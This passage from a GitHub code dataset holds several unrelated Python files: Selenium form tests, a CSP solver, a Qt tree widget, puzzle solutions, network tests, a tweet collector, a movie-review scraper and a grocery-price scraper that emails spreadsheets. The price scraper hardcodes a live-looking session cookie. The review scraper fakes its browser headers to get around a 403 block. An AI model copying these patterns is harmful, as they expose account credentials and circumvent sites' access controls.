value=(Search_element_sheet.loc[86,'accessbility_id']))\r\n\tSave.click()\r\n\ttime.sleep(5)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#Investment option page\r\n\tSelectplatform=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[87,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Selectplatform);\r\n\tcommon_call.highlight_element(Selectplatform, 2, 5)\r\n\ttime.sleep(7)\r\n\tprint(Selectplatform.text)\r\n\tSelectplatform.click()\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\t#Percentage allocation\r\n\tAllocate_percentage_asset = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[109,'accessbility_id']))\r\n\tAllocate_percentage_asset.clear()\r\n\tAllocate_percentage_asset.send_keys('100')\r\n\ttime.sleep(5)\r\n\r\n\tRebalancingOption = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[93,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", RebalancingOption);\r\n\ttime.sleep(15)\r\n\tprint(RebalancingOption.text)\r\n\tRebalancingOption.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#charges heading\r\n\theading1 =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[134,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", heading1);\r\n\tcommon_call.highlight_element(heading1, 2, 5)\r\n\tprint(heading1.text)\r\n\ttime.sleep(7)\r\n\r\n\t#charges page error\r\n\tchargeserror=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[148,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", chargeserror);\r\n\tcommon_call.highlight_element(chargeserror, 2, 5)\r\n\tprint(chargeserror.text)\r\n\ttime.sleep(3)\r\n\r\n\t#charges page check box selection\r\n\tchargecheckbox =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[96,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", chargecheckbox);\r\n\tcommon_call.highlight_element(chargecheckbox, 2, 5)\r\n\tprint(chargecheckbox.text)\r\n\tchargecheckbox.click()\r\n\ttime.sleep(3)\r\n\r\n\t#charges page check box selection\r\n\tchargetype =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[97,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", chargetype);\r\n\tcommon_call.highlight_element(chargetype, 2, 5)\r\n\tprint(chargetype.text)\r\n\tchargetype.click()\r\n\ttime.sleep(3)\r\n\r\n\t#Enter percentage value\r\n\tpercantage=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[98,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", percantage);\r\n\tcommon_call.highlight_element(percantage, 2, 5)\r\n\tpercantage.clear()\r\n\tpercantage.send_keys('4')\r\n\ttime.sleep(3)\r\n\r\n\r\n\t#ongoiing adviser charge yes radio button selection\r\n\tOngoingadviser = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[94,'accessbility_id']))\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Ongoingadviser, 2, 5)\r\n\tprint(Ongoingadviser.text)\r\n\tOngoingadviser.click()\r\n\r\n\t#charge type\r\n\tChargetype = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[95,'accessbility_id']))\r\n\t#driver.execute_script(\"arguments[0].scrollIntoView()\", Chargetype);\r\n\t#if (device == 'Chrome/latest') or (device == 'Edge/latest') or (device == 'Firefox/latest') or (device == 'Safari/15'):\r\n\tcommon_call.highlight_element(Chargetype, 2, 5)\r\n\tprint(Chargetype.text)\r\n\tChargetype.click()\r\n\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#Enter percentage value\r\n\tpercantage1=driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[99,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", percantage1);\r\n\tcommon_call.highlight_element(percantage1, 2, 5)\r\n\tpercantage1.clear()\r\n\tpercantage1.send_keys('2')\r\n\ttime.sleep(3)\r\n\r\n\t#Calculating charges by percentage of product value CTA\r\n\tCTA= driver.find_element(by=By.PARTIAL_LINK_TEXT, value=(\"Calculating charges \"))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", CTA);\r\n\tprint(CTA.text)\r\n\tCTA.click()\r\n\r\n\ttime.sleep(2)\r\n\t#Modal Calculation CTA\r\n\tcalculationcta = driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[91,'accessbility_id']))\r\n\tprint(calculationcta.text)\r\n\tcalculationcta.click()\r\n\r\n\tClose= driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[55,'accessbility_id']))\r\n\tClose.click()\r\n\r\n\t#Next Button Click\r\n\tNext_button =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[32,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Next_button);\r\n\tcommon_call.highlight_element(Next_button, 2, 5)\r\n\tprint(Next_button.text)\r\n\tdriver.implicitly_wait(20)\r\n\tNext_button.click()\r\n\ttime.sleep(7)\r\n\r\n\t#Save and Exit Button Click\r\n\tApply =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[150,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Apply);\r\n\tcommon_call.highlight_element(Apply, 2, 5)\r\n\tprint(Apply.text)\r\n\r\n\t# Personal Illustration\r\n\tWebDriverWait(driver, 30).until(EC.presence_of_element_located((By.XPATH,Search_element_sheet.loc[149, 'accessbility_id'])))\r\n\tIllustration2 =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[149,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Illustration2);\r\n\tcommon_call.highlight_element(Illustration2, 2, 5)\r\n\tprint(Illustration2.text)\r\n\tsearch_result.append(Illustration2.text)\r\n\tdriver.implicitly_wait(20)\r\n\tIllustration2.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\t#Exit Button Click\r\n\tExit =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[35,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", Exit);\r\n\tcommon_call.highlight_element(Exit, 2, 5)\r\n\tprint(Exit.text)\r\n\tdriver.implicitly_wait(20)\r\n\tExit.click()\r\n\ttime.sleep(7)\r\n\r\n\t#Save and Exit Button Click\r\n\tSaveExit =driver.find_element(by=By.XPATH, value=(Search_element_sheet.loc[46,'accessbility_id']))\r\n\tdriver.execute_script(\"arguments[0].scrollIntoView()\", SaveExit);\r\n\tcommon_call.highlight_element(Exit, 2, 5)\r\n\tprint(SaveExit.text)\r\n\tdriver.implicitly_wait(20)\r\n\tSaveExit.click()\r\n\ttime.sleep(7)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\treturn search_result\r\n\r\nfunctional_common_call.login_quick(Username,Password,driver,web_address)\r\nsearch_result = val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page()\r\n\r\nsession_id=common_call.get_session_id(driver)\r\nprint(session_id)\r\ntime.sleep(10)\r\nactual_result_list=search_result\r\noutput_df=common_call.create_output(input_df,actual_result_list,session_id,BROWSERSTACK_USERNAME,BROWSERSTACK_ACCESS_KEY,driver)\r\nprint(output_df)\r\noutput_df.to_csv(output_file+op_filename+\"_output.csv\",index = False)\r\n\r\ndriver.quit()\r\ncommon_call.stop_local()","repo_name":"asish143/Python_Selenium","sub_path":"val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page.py","file_name":"val_2nd_Purchase_Adviser_Produce_Illustration_GIA_Page.py","file_ext":"py","file_size_in_byte":19000,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9416610150","text":"'''\nCreated on Apr 11, 2020\n\n@author1: leyu_lin(Jack)\n@author2: Parth_Thummar\n\nbacktracking search\n'''\nfrom csp_lib.backtrack_util import (first_unassigned_variable,\n unordered_domain_values,\n no_inference)\n\n\ndef backtracking_search(csp,\n select_unassigned_variable=first_unassigned_variable,\n order_domain_values=unordered_domain_values,\n inference=no_inference):\n \"\"\"backtracking_search\n Given a constraint satisfaction problem (CSP),\n a function handle for selecting variables, \n a function handle for selecting elements of a domain,\n and a set of inferences, solve the CSP using backtrack search\n \"\"\"\n\n # See Figure 6.5] of your book for details\n\n def backtrack(assignment):\n \"\"\"Attempt to backtrack search with current assignment\n Returns None if there is no solution. Otherwise, the\n csp should be in a goal state.\n \"\"\"\n # check if value assigned\n if len(assignment) == len(csp.variables):\n return assignment\n\n # check other possible values\n var = select_unassigned_variable(assignment, csp)\n # check values in arcs assign values\n for val in order_domain_values(var, assignment, csp):\n if csp.nconflicts(var, val, assignment) is 0:\n csp.assign(var, val, assignment)\n # called support prune\n removals = csp.suppose(var, val)\n if inference(csp, var, val, assignment, removals):\n # recursive back track\n sol = backtrack(assignment)\n if sol is not None:\n return sol\n csp.restore(removals)\n csp.unassign(var, assignment)\n return None\n\n # Call with empty assignments, variables accessed\n # through dynamic scoping (variables in outer\n # scope can be accessed in Python)\n result = backtrack({})\n assert result is None or csp.goal_test(result)\n return result\n","repo_name":"leyulin/CS550","sub_path":"A4/backtrack.py","file_name":"backtrack.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9659942168","text":"# taken from https://stackoverflow.com/a/46096319/11009349\n\nfrom PySide6 import QtGui\nfrom PySide6.QtWidgets import QMainWindow, QTreeWidget, QTreeWidgetItem\n\n\nclass ViewTree(QTreeWidget):\n def __init__(self, value, parent=None):\n super().__init__(parent)\n self.setHeaderLabel(\"Computation parameters\")\n\n def fill_item(item, value):\n def new_item(parent, text, val=None):\n child = QTreeWidgetItem([text])\n fill_item(child, val)\n parent.addChild(child)\n child.setExpanded(True)\n\n if value is None:\n return\n elif isinstance(value, dict):\n for key, val in sorted(value.items()):\n new_item(item, str(key), val)\n elif isinstance(value, (list, tuple)):\n for val in value:\n text = (\n str(val)\n if not isinstance(val, (dict, list, tuple))\n else \"[%s]\" % type(val).__name__\n )\n new_item(item, text, val)\n else:\n new_item(item, str(value))\n\n fill_item(self.invisibleRootItem(), value)\n\n\nclass ComputedChannelInfoWindow(QMainWindow):\n def __init__(self, signal, parent=None):\n super().__init__(parent)\n self.setCentralWidget(ViewTree(signal.computation, self))\n self.setWindowTitle(f\"Computed channel {signal.name}\")\n self.setMinimumSize(600, 400)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\":/info.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n\n self.setWindowIcon(icon)\n","repo_name":"danielhrisca/asammdf","sub_path":"src/asammdf/gui/widgets/dict_to_tree.py","file_name":"dict_to_tree.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":542,"dataset":"github-code","pt":"61"} +{"seq_id":"23545711531","text":"class Tree:\n def __init__(self, k, pancakes):\n self.value = list(pancakes)\n self.n = len(pancakes)\n self.k = k\n self.selections = self.n - k + 1\n self.children = []\n self.depth = 0\n self.allSidesUp = False\n\n def make_children(self):\n for i in range(self.selections):\n new_pancakes = self.value[:]\n for j in range(self.k):\n if new_pancakes[i+j] == \"+\":\n new_pancakes[i+j] = \"-\"\n else:\n new_pancakes[i+j] = \"+\"\n child = Tree(self.k, \"\".join(new_pancakes))\n child.depth = self.depth + 1\n self.children.append(child)\n if \"\".join(new_pancakes) == \"+\"*self.n:\n self.allSidesUp = True\n\n def getValue(self):\n return \"\".join(self.value)\n\n def ifAllSideUp(self):\n return self.allSidesUp\n\n def print_children(self):\n for child in self.children:\n print(\"Pancakes: \" + \"\".join(child.value))\n\ndef solution(root):\n toExplore = {root}\n visited = {root.getValue()}\n while len(toExplore) != 0:\n newExplore = set()\n for node in toExplore:\n node.make_children()\n if node.ifAllSideUp():\n return node.depth + 1\n for child in node.children:\n if child.getValue() not in visited:\n visited.add(child.getValue())\n newExplore.add(child)\n toExplore = newExplore\n return -1\n\nfile = open('input.txt')\ntests = int(file.readline())\ncases = []\nfor t in range(tests):\n cases.append(file.readline().strip().split(' '))\ntest = 0\nfor pancakes, k in cases:\n test += 1\n answer = 0\n if not len(pancakes)*\"+\" == pancakes:\n root = Tree(int(k), pancakes)\n answer = solution(root)\n if answer != -1:\n print(\"Case #{}: {}\".format(test, answer))\n else:\n print(\"Case #{}: IMPOSSIBLE\".format(test))\n\n\n\n\n\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3198.py","file_name":"3198.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9415789696","text":"import json\nimport pickle\n\n\ndef _check(context, loaded):\n names = set([x.get_attr('IFLA_IFNAME') for x in loaded])\n indices = set([x['index'] for x in loaded])\n assert names == {x.ifname for x in context.ndb.interfaces.dump()}\n assert indices == {x.index for x in context.ndb.interfaces.dump()}\n\n\ndef test_pickle(context):\n links = tuple(context.ipr.link('dump'))\n saved = pickle.dumps(links)\n loaded = pickle.loads(saved)\n _check(context, loaded)\n\n\ndef test_json(context):\n links = tuple(context.ipr.link('dump'))\n saved = json.dumps([x.dump() for x in links])\n msg_type = type(links[0])\n loaded = [msg_type().load(x) for x in json.loads(saved)]\n _check(context, loaded)\n\n\ndef test_dump(context):\n links = tuple(context.ipr.link('dump'))\n saved = [(type(x), x.dump()) for x in links]\n loaded = [x[0]().load(x[1]) for x in saved]\n _check(context, loaded)\n","repo_name":"svinota/pyroute2","sub_path":"tests/test_linux/test_integration/test_serialize.py","file_name":"test_serialize.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":888,"dataset":"github-code","pt":"61"} +{"seq_id":"23643845421","text":"def isRecycled(int1, int2):\r\n str1 = str(int1)\r\n str2 = str(int2)\r\n if len(str1) != len(str2):\r\n return False\r\n\r\n for i in range(len(str1)):\r\n part1 = str1[:i]\r\n part2 = str1[i:]\r\n total = part2 + part1\r\n if total == str2:\r\n return True\r\n return False\r\n\r\n\r\na_file = open('C-small-attempt0.in')\r\nnumcases = int(a_file.readline())\r\n\r\nfor k in range(numcases):\r\n \r\n param = a_file.readline()\r\n params = param.split()\r\n start = int(params[0])\r\n end = int(params[1])\r\n counter = 0\r\n for i in range(start, end + 1):\r\n for j in range(i + 1, end+1):\r\n if isRecycled(i, j):\r\n counter += 1\r\n \r\n \r\n print(\"Case #\" + str(k + 1) + \":\", counter)\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/1542.py","file_name":"1542.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8847026922","text":"import tweepy\nimport pymongo\nimport json\nimport sys\nimport time\n\nclass StdOutListener(tweepy.StreamListener):\n\n def __init__(self):\n self.logFile = \"\"\n self.collection = \"\"\n self.backOff = None\n \n def setLogFile(self, arq):\n self.logFile = arq\n \n def closeLogFile(self):\n if ( (self.logFile != None) and (self.logFile != \"\") ):\n self.logFile.close()\n \n def setCollection(self, collection):\n self.collection = collection\n \n def setTimerBackOffToStream(self, backOff):\n self.backOff = backOff\n \n def on_data(self, data): \n if (self.collection == \"\"):\n print (\"Error: use setCollection para definir uma colecao no mongo\")\n return\n\n data = json.loads(data)\n self.collection.insert(data)\n self.backOff.reiniciarContadorTentativas()\n\n def on_error(self, status):\n self.logFile.write(\"\\n\\nerror:\"+str(status))\n self.backOff.timeReconexao(status)\n\n\nclass TimerBackOffToStream(object):\n\n def __init__(self):\n self.tentativas = 1 #fator de multiplicacao\n\n def timeReconexao(self, HTTPerror=0):\n '''\n Avoiding to block the user's IP or credentials.\n '''\n if (HTTPerror == 420):\n time.sleep(60 * self.tentativas)\n elif (self.tentativas == 1):\n time.sleep(5)\n else:\n time.sleep(5 * self.tentativas * 2)\n self.tentativas += 1\n\n def setTentativas(self,incrementar):\n self.tentativas += incrementar\n \n def reiniciarContadorTentativas(self):\n self.tentativas = 1\n\nif __name__ == '__main__':\n \n '''\n dependencias: tweepy e pymongo. Instale em sua maquina.\n script para python 2, portar para o 3.\n '''\n #Obtenha as credenciais no twitter https://apps.twitter.com/\n #Variables that contains the user credentials to access Twitter API \n Consumer_key = \"\"\n Consumer_secret = \"\"\n Access_token = \"\"\n Access_token_secret = \"\"\n\n backOff = TimerBackOffToStream() \n\n #substitua o nome do arquivo de log\n arqLog = open(\"NOMEARQUIVO\",\"a\")\n \n while (True):\n try:\n #This handles Twitter authetification and the connection to Twitter Streaming API\n l = StdOutListener()\n \n #Definindo banco e collection no mongo onde serao salvos os dados\n mongo = pymongo.MongoClient()\n db = mongo['NOME DO BANCO MONGO']\n collection = db['NOME DA COLECAO NO MONGO']\n \n l.setCollection(collection) \n l.setLogFile(arqLog)\n l.setTimerBackOffToStream(backOff)\n \n auth = tweepy.OAuthHandler(Consumer_key, Consumer_secret)\n auth.set_access_token(Access_token, Access_token_secret)\n stream = tweepy.Stream(auth, l)\n \n #termos de busca seprados por virgula. Se for #, usar o simbolo.\n termos = ['aecio','psdb']\n #,'#agrevefracassou','#euvoutrabalhar','#brasiltrabalhador'\n \n #This line filter Twitter Streams to capture data by the hashtags\n stream.filter(track=termos)\n\n except:\n print (\"except\")\n arqLog.write(\"\\nError: Exception:\"+str(sys.exc_info()[0]))\n backOff.timeReconexao()\n \n","repo_name":"labcores/p_crawler_labcores","sub_path":"twitterStream_tweepy.py","file_name":"twitterStream_tweepy.py","file_ext":"py","file_size_in_byte":3383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29782777686","text":"try:\n f = open(\"p022_names.txt\", \"r\")\nexcept FileNotFoundError:\n print(\"Couldn't find the file\")\n exit()\nif f.mode == 'r':\n contents = f.read()\nelse:\n print(\"The file isn't open to read.\")\n exit()\nf.close()\nnames = contents[1:len(contents)-1].split('\",\"')\nnames.sort()\nsumm = 0\nfor i in range(len(names)):\n s = 0\n for letter in names[i]:\n s += ord(letter) - 64\n summ += s * (i+1)\nprint(summ)\n","repo_name":"salmanchik1/Project_Euler","sub_path":"22/22.py","file_name":"22.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41357347349","text":"from urllib import request\nimport json\nimport xlwt\nimport datetime\nimport operationPath\nimport sendFile\nimport combineExcle\nimport time\nimport setBorder\nimport handleFile\nimport sendFile_special\n\n\n# 获取接口内容\ndef get_html():\n url = \"https://bshop.guanmai.cn/product/sku/get?level=1&category_id=\"\n # A118200 野菜 A6988 时令蔬菜 A6982 肉禽类 A6986 水果类\n key = [\"A6988\",\"A6982\",\"A6986\"]\n headers = {\n \"Cookie\": \"cms_key=srfc; group_id=630; gr_user_id=7b087989-dc51-4066-94f6-bf064a0b05d2; 9beedda875b5420f_gr_session_id=0168e4b9-f768-4690-ba26-5564f1ee94e9; 9beedda875b5420f_gr_session_id_0168e4b9-f768-4690-ba26-5564f1ee94e9=true; Hm_lvt_d02cd7e3028015e0088f63c017c81147=1654602700; sessionid=rrdk63iop731j3ruvq8fadcp0ga3qf61; Hm_lpvt_d02cd7e3028015e0088f63c017c81147=1654602754; 9beedda875b5420f_gr_last_sent_sid_with_cs1=0168e4b9-f768-4690-ba26-5564f1ee94e9; 9beedda875b5420f_gr_last_sent_cs1=1801126; 9beedda875b5420f_gr_cs1=1801126\"\n }\n html = []\n for i,j in enumerate(key):\n newUrl = url + j;\n req = request.Request(url=newUrl, headers=headers)\n res = request.urlopen(req)\n html.append(res.read().decode(\"utf-8\", \"ignore\"))\n\n # windows会存在乱码问题,需要使用 gbk解码,并使用ignore忽略不能处理的字节\n # linux不会存在上述问题,可以直接使用decode('utf-8')解码\n return html\n\ndef getStyle(stype):\n\n # 表头\n if stype == \"title\":\n # 字体格式\n style = xlwt.XFStyle()\n titlefont = xlwt.Font()\n titlefont.name = \"宋体\"\n titlefont.height = 16 * 20\n style.font = titlefont\n # 表头单元格格式\n align = xlwt.Alignment()\n align.horz = 0x02\n align.vert = 0x01\n style.alignment = align\n return style\n\n # 表头\n if stype == \"title1\":\n # 字体格式\n style = xlwt.XFStyle()\n titlefont = xlwt.Font()\n titlefont.name = \"宋体\"\n titlefont.height = 14 * 20\n style.font = titlefont\n # 表头单元格格式\n align = xlwt.Alignment()\n align.horz = 0x02\n align.vert = 0x01\n style.alignment = align\n return style\n #单元格格式\n if stype == \"cell\":\n style = xlwt.XFStyle()\n titlefont = xlwt.Font()\n titlefont.name = \"宋体\"\n titlefont.height = 11 * 20\n style.font = titlefont\n # 表头单元格格式\n align = xlwt.Alignment()\n align.vert = 0x01\n style.alignment = align\n return style\n\n\n# 解析json并将内容输出到邮件\ndef saveExcleOnDay(html):\n now = datetime.datetime.now().strftime('%Y-%m-%d')\n weekday = datetime.datetime.now().weekday()\n\n workbook = xlwt.Workbook() # 打开一个工作簿\n # 创建一个worksheet\n worksheet = workbook.add_sheet(now + \"(\" + handleFile.getWeekDayName(weekday) + \")\")\n for i in range(0,3):\n first_col = worksheet.col(i*3) # 获取第一列\n first_col.width = 256 * 20 # 设置第一列列宽\n tall_style = xlwt.easyxf('font:height 400') # 设置行高\n worksheet.write_merge(0, 0, 0, 8, \"幼鲜知价格表(\" + now + \") 单位:元/斤\",getStyle(\"title\"))\n worksheet.write_merge(1, 1, 0, 2, \"幼鲜知蔬菜价格表\",getStyle(\"title1\"))\n worksheet.write_merge(1, 1, 3, 5, \"幼鲜知肉禽价格表\",getStyle(\"title1\"))\n worksheet.write_merge(1, 1, 6, 8, \"幼鲜知水果价格表\",getStyle(\"title1\"))\n for i in range(0,2):\n row = worksheet.row(i)\n row.set_style(tall_style) # 设置行高\n for i,data in enumerate(html):\n worksheet.write(2,i*3+0,\"品名\",getStyle(\"title1\"))\n worksheet.write(2,i*3+1,\"价格\",getStyle(\"title1\"))\n worksheet.write(2,i*3+2,\"单位\",getStyle(\"title1\"))\n for j, row in enumerate(json.loads(data).get(\"data\")):\n worksheet.write(j+3,i*3+0,row.get(\"name\"),getStyle(\"cell\"))\n worksheet.write(j+3,i*3+1,row.get(\"std_sale_price\")/100,getStyle(\"cell\"))\n worksheet.write(j+3,i*3+2,row.get(\"std_unit_name\"),getStyle(\"cell\"))\n first_row = worksheet.row(j + 3)\n first_row.set_style(tall_style) # 设置行高\n workbook.save(now+\"(\"+ handleFile.getWeekDayName(weekday)+ \")\" + \".xls\")\n\ndef main():\n try:\n print(\"小助手运行中......\")\n while True:\n # now = datetime.datetime.now().strftime('%Y-%m-%d')\n now = datetime.datetime.now().weekday()\n # 确保只发送周五往前推一个周的数据\n if now != 4 :\n now = ((datetime.datetime.now())+datetime.timedelta(days= 4-now)).strftime('%Y-%m-%d')\n weekday = 4\n nowTime = time.strftime(\"%H:%M:%S\")\n if time.strptime(nowTime, \"%H:%M:%S\").__ge__(time.strptime(\"08:30:00\", \"%H:%M:%S\")) and operationPath.containFile(datetime.datetime.now().strftime('%Y-%m-%d')+\"(\"+ handleFile.getWeekDayName(datetime.datetime.now().weekday())+ \")\"+ \".xls\"):\n # 保存当天的excle\n saveExcleOnDay(get_html())\n print(\"保存当天文件成功: \" + now)\n if operationPath.containFile(str(now) + \"(\" + handleFile.getWeekDayName(weekday) + \")\" + \"--\") and operationPath.containFile(datetime.datetime.now().strftime('%Y-%m-%d') + \"(\" + handleFile.getWeekDayName(\n datetime.datetime.now().weekday()) + \")\" + \"--\"):\n if (time.strptime(nowTime, \"%H:%M:%S\").__ge__(\n time.strptime(\"08:30:00\", \"%H:%M:%S\")) and datetime.datetime.now().weekday() >= 4):\n # pass\n # 合并当周获取的文件\n print(\"合并当周获取的文件\")\n title = combineExcle.combineExcle()\n # 设置边框样式\n sheets = handleFile.getDatePath(False)\n setBorder.getFileAndSetStype(title, sheets)\n # 发送至指定邮箱到公共区域\n msg = title + \"幼鲜知价格表\"\n print(\"发送至指定邮箱 到 公共区域\")\n message = sendFile.message_config(msg)\n sendFile.send_mail(message)\n print(\"发给小主子.....\")\n msg = msg + \"准备好啦\"\n message = sendFile_special.message_config(msg)\n sendFile_special.send_mail(message)\n print(\"当周数据完成!!! \" + title)\n print(\"准备删除上周文件....\")\n operationPath.removeWeekFile()\n print(\"删除成功...\")\n except Exception as e:\n print(\"获取失败!!!!!!\")\n print(e)\n\nif __name__ == '__main__':\n main()","repo_name":"XiaoCaicai777/Little-assistant","sub_path":"getFruitTest.py","file_name":"getFruitTest.py","file_ext":"py","file_size_in_byte":6855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20789400285","text":"from re import search\nfrom urllib.parse import urljoin\nfrom scrapy import Request, Spider\nfrom ..items import ReviewsAllocineItem\n\nclass SpiderReviewsAllocine(Spider):\n name = \"reviews_allocine\"\n domain = \"http://www.allocine.fr/\"\n \n # Le nombre de page limite (Nombre de films parcourues ~= 15*limit)\n limit = 3000\n\n # Nombre de commentaires par page\n reviews_per_page = 15\n\n # \"entry_url\" correspond à la section \"Tous les films\"\n entry_url = \"http://www.allocine.fr/films/\"\n\n # On a une erreur 403 quand on d'atteindre la page des commentaires sans un 'referer' et un 'user-agent' différent de celui de scrapy\n headers = {'referer': domain, 'user-agent':'Mozilla/5.0 (X11; Linux x86_64)'}\n\n def start_requests(self):\n for page in range(1, self.limit+1):\n url = urljoin(self.entry_url, f\"?page={page}\")\n\n yield Request(url=url, callback=self.parse_films, headers=self.headers)\n\n def parse_films(self, response):\n \"\"\"\n Cette fontion parse la liste des film de la section 'Tous les films'\n Pour chacun des film de la section on va chercher le lien qui dirige sur la \n page où se trouvent les commentaires des spectateurs : \"http://www.allocine.fr/film/fichefilm-{id_film}/critiques/spectateurs/\"\n l'identifiant du film se trouve dans le lien qui mene à la page 'détails' du film : '/film/fichefilm_gen_cfilm={id_film}.html'\n\n Args:\n response (Response): L'objet scrapy.Response qui correspond à la réponse de la requête faite dans 'start_requests'\n \"\"\"\n # Liste des film de la page\n film_cards = response.css(\"main section.section ul > li.mdl > div.card\")\n for film_card in film_cards: \n title = film_card.css(\"div.meta > h2.meta-title a::text\").extract_first()\n uri = film_card.css(\"div.meta > h2.meta-title a::attr(href)\").extract_first()\n\n # On veut recupérer l'identifiant du film 268644 dans '/film/fichefilm_gen_cfilm=268644.html'\n id_film = search(r'/film/fichefilm_gen_cfilm=(.*?).html', uri).group(1)\n url_reviews = f\"{self.domain}film/fichefilm-{id_film}/critiques/spectateurs/\"\n\n yield Request(url=url_reviews, callback=self.parse_reviews, meta={'title': title, 'id_film': id_film, 'page': 1}, headers=self.headers)\n\n\n def parse_reviews(self, response):\n \"\"\"\n Cette fonction parse les commentaires laissés par les spectateurs\n\n Args:\n response (Response): L'objet scrapy.Response qui correspond à la réponse de la requête faite dans 'start_requests'\n \"\"\"\n review_cards = response.css(\"section.section div.review-card\")\n for review_card in review_cards:\n review = review_card.css(\"div.content-txt::text\").extract_first()\n review = review.strip()\n stars = review_card.css(\"span.stareval-note::text\").extract_first()\n # Pour avoir la note (nombre d'étoiles) en float\n stars = float(stars.replace(\",\", \".\"))\n \n item = ReviewsAllocineItem()\n\n item['title'] = response.meta['title']\n item['stars'] = stars\n item['review'] = review\n\n yield item\n \n # Pagination\n if 